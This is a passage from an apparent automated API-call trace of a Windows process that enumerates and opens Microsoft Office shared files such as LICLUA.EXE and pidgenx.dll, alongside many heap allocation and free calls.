(in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0086.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0086.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0086.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0086.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0086.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0086.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0086.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0086.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0086.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0086.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0086.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0086.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0086.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0086.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0086.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0086.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0086.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0086.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0086.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0086.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0086.232] AreFileApisANSI () returned 1 [0086.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0086.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x86) returned 0x82718 [0086.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x82718, cchWideChar=67 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE") returned 67 [0086.232] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\liclua.exe"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b5b0d00, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0xd9e7b530, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x5b5b0d00, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x58cd0)) returned 1 [0086.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82718 | out: hHeap=0x20000) returned 1 [0086.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0086.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0086.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0086.233] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.233] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.233] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xd9f60362, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xa0a26299, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xda982389, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Office Setup Controller", cAlternateFileName="OFFICE~1")) returned 1 [0086.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0086.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0086.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0086.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0086.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0086.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0086.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0086.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0086.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0086.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0086.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0086.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0086.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0086.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0086.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0086.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0086.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0086.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0086.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0086.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0086.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0086.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0086.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0086.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fdc8 [0086.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0086.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0086.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0086.234] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fdc8 | out: hHeap=0x20000) returned 1 [0086.234] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.234] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.234] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.234] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.234] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0086.234] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0086.234] AreFileApisANSI () returned 1 [0086.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller", lpUsedDefaultChar=0x0) returned 80 [0086.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0086.234] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.234] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0086.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0086.235] AreFileApisANSI () returned 1 [0086.235] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0086.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0086.235] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller") returned 80 [0086.235] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.235] GetLastError () returned 0x5 [0086.235] GetLastError () returned 0x5 [0086.235] SetLastError (dwErrCode=0x5) [0086.235] GetLastError () returned 0x5 [0086.235] SetLastError (dwErrCode=0x5) [0086.235] GetLastError () returned 0x5 [0086.235] SetLastError (dwErrCode=0x5) [0086.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0086.235] AreFileApisANSI () returned 1 [0086.235] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0086.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0086.235] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller") returned 80 [0086.235] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.235] GetLastError () returned 0x5 [0086.235] GetLastError () returned 0x5 [0086.235] SetLastError (dwErrCode=0x5) [0086.236] GetLastError () returned 0x5 [0086.236] SetLastError (dwErrCode=0x5) [0086.236] GetLastError () returned 0x5 [0086.236] SetLastError (dwErrCode=0x5) [0086.236] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0086.236] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0086.236] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0086.236] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0086.236] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.236] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.236] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.236] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0086.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0086.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0086.236] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0086.236] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0086.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0086.236] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0086.236] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x273f2, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x9e, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x5f7a0, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x9e, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="")) returned 0 [0086.236] FindClose (in: hFindFile=0x78610 | out: hFindFile=0x78610) returned 1 [0086.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0086.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0086.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0086.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x55f20 [0086.236] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xee) returned 0x80a30 [0086.236] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0086.236] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78250 [0086.238] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xd9f60362, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xa0a26299, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xda982389, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0086.238] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69e1fe00, ftCreationTime.dwHighDateTime=0x1d0d79d, ftLastAccessTime.dwLowDateTime=0xd9ff8cc1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x69e1fe00, ftLastWriteTime.dwHighDateTime=0x1d0d79d, nFileSizeHigh=0x0, nFileSizeLow=0x168258, dwReserved0=0x0, dwReserved1=0x0, cFileName="pidgenx.dll", cAlternateFileName="")) returned 1 [0086.238] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0086.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0086.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0086.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0086.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0086.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0086.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0086.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0086.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x55f20 [0086.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46a58 [0086.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0086.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0086.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0086.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0086.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0086.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0086.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0086.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0086.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0086.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xee) returned 0x80a30 [0086.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0086.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0086.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x4ebc8 [0086.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0086.239] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.239] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.239] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.239] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0086.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.239] AreFileApisANSI () returned 1 [0086.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll", lpUsedDefaultChar=0x0) returned 92 [0086.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0086.240] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.240] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.240] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0086.240] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0086.240] AreFileApisANSI () returned 1 [0086.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0086.240] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x4ebc8 [0086.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll") returned 92 [0086.240] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pidgenx.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0086.241] GetFileType (hFile=0x424) returned 0x1 [0086.241] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0086.241] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0086.241] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0086.241] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0086.241] CloseHandle (hObject=0x424) returned 1 [0086.241] AreFileApisANSI () returned 1 [0086.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0086.241] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x4ebc8 [0086.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll") returned 92 [0086.242] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pidgenx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0086.242] GetFileType (hFile=0x424) returned 0x1 [0086.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0086.242] CloseHandle (hObject=0x424) returned 1 [0086.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0086.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0086.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0086.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0086.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0086.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0086.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0086.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0086.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0086.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0086.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0086.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0086.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0086.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0086.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0086.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 